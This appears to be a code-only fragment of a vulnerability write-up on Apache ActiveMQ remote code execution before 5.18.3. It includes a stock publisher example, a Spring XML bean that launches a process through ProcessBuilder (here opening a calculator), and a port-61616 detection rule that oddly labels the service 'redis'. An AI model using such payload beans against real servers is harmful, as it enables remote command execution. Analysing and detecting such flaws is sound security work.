Apache ActiveMQ < 5.18.3 远程代码执行漏洞分析

/** * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements.  See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License.  You may obtain a copy of the License at * *      http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */import org.apache.activemq.ActiveMQConnectionFactory;import org.apache.activemq.command.ActiveMQTopic;import javax.jms.*;class Publisher {    public static void main(String []args) throws JMSException {        String user = env("ACTIVEMQ_USER", "admin");        String password = env("ACTIVEMQ_PASSWORD", "password");        String host = env("ACTIVEMQ_HOST", "localhost");        int port = Integer.parseInt(env("ACTIVEMQ_PORT", "61616"));        String destination = arg(args, 0, "event");        int messages = 10000;        int size = 256;        String DATA = "abcdefghijklmnopqrstuvwxyz";        String body = "";        for( int i=0; i < size; i ++) {            body += DATA.charAt(i%DATA.length());        }        ActiveMQConnectionFactory factory = new ActiveMQConnectionFactory("tcp://" + host + ":" + port);        Connection connection = factory.createConnection(user, password);        connection.start();        Session session = connection.createSession(false, Session.AUTO_ACKNOWLEDGE);        Destination dest = new ActiveMQTopic(destination);        MessageProducer producer = session.createProducer(dest);        producer.setDeliveryMode(DeliveryMode.NON_PERSISTENT);        for( int i=1; i <= messages; i ++) {            TextMessage msg = session.createTextMessage(body);            msg.setIntProperty("id", i);            producer.send(msg);            if( (i % 1000) == 0) {                System.out.println(String.format("Sent %d messages", i));            }        }        producer.send(session.createTextMessage("SHUTDOWN"));        connection.close();    }    private static String env(String key, String defaultValue) {        String rc = System.getenv(key);        if( rc== null )            return defaultValue;        return rc;    }    private static String arg(String []args, int index, String defaultValue) {        if( index < args.length )            return args[index];        else            return defaultValue;    }}

<?xml version="1.0" encoding="UTF-8" ?><beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">    <constructor-arg>      <list>        <value>open</value>        <value>-a</value>        <value>calculator</value>      </list>    </constructor-arg>  </bean></beans>

protocol: TCP directive_name: activemq ports: - 61616 matches: - service: redis pattern: ^RActiveM

activemq.jar